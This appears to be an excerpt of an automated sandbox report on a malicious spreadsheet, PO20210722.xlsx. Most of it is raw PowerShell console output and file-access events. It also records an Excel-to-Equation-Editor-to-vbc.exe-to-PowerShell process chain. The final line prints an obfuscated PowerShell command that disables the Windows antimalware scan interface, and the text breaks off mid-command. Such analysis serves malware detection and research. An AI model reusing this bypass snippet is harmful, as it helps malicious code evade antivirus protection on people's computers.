          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......P..............._.............}..v....`@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............4..j.....A................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......P..............._.............}..v....`H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............4..j.....I................_.............}..v.....I......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Q................_.............}..v.....Q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............6.7.7.8.).|.I.`.E.`.X............._.............}..v....0U......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....U................_.............}..v....hV......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....]................_.............}..v....h^......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....b......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....b................_.............}..v....8c......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`h......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....i................_.............}..v.....i......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v....(m......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....m................_.............}..v....`n......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....`.P..............._.............}..v.....c......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................_.............}..v.... e......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v.... .......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v....0.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0%......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....%................_.............}..v....h&......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0-......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....-................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....3......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....4................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....;......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....<................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....@......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j....XA................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....G......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....G................_.............}..v....8H......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.....K......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....L................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............da.j....@FP..............._.............}..v.... b'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................a.j.....b'..............._.............}..v....Xc'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.p.p.o.r.t.e.d..."..............._.............}..v.....f'.....0................BP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................a.j.....g'..............._.............}..v.... h'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.5.9.............}..v....0l'.....0................BP.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................a.j.....l'..............._.............}..v....hm'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............da.j....@FP..............._.............}..v....0t'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................a.j.....t'..............._.............}..v....hu'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............da.j....@FP..............._.............}..v....0|'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................a.j.....|'..............._.............}..v....h}'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v......'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v......'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................BO............................. ................._...............................N.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j....h.'..............._.............}..v......'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....8.'.....0.......................r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....p.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......da.j....@FP..............._.............}..v......'.....0................BP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....8.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......P..............._.............}..v.....H......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....(.$.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......$..............._.............}..v....`.$.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.7._.............}..v....p.$.....0.................P.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....(.$..............._.............}..v......$.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v......$.....0.......................^.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......$..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v......%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s....... . . .x.c.e.p.t.i.o.n............._.............}..v......%.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....X.%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v......%.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......%..............._.............}..v....8.%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v......%.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....8.+.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......+..............._.............}..v....p.+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.2._.............}..v..... +.....0.................P.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8!+..............._.............}..v.....!+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....(+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8)+..............._.............}..v.....)+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....0+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....81+..............._.............}..v.....1+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....8+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....89+..............._.............}..v.....9+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.'.;.+.....0.................P.....:.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....>+..............._.............}..v....0?+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....E+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....F+..............._.............}..v....0G+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....J+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....K+..............._.............}..v.....L+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....(Q+.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Q+..............._.............}..v....`R+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.....U+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....V+..............._.............}..v....(W+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v......+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....8.+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......P..............._.............}..v....`O,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v......,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v......,.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............T..j......P..............._.............}..v....(.,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......P..............._.............}..v....(F-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............T..j......P..............._.............}..v.....G-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v......-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............T..j......P..............._.............}..v....h.-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....h.-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v......-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................_.............}..v.....J......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v.....K......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v....H.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....A/.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v.....C/.....0.................P.............................
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.W.I.N.D.O.W.S.\.s.y.s.w.o.w.6.4.\.c.a.l.c...e.x.e.................................<.........=.......=.....
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................=.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys....0.........=.............................&.................=.....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO20210722.xlsxVirustotal: Detection: 28%
          Source: PO20210722.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 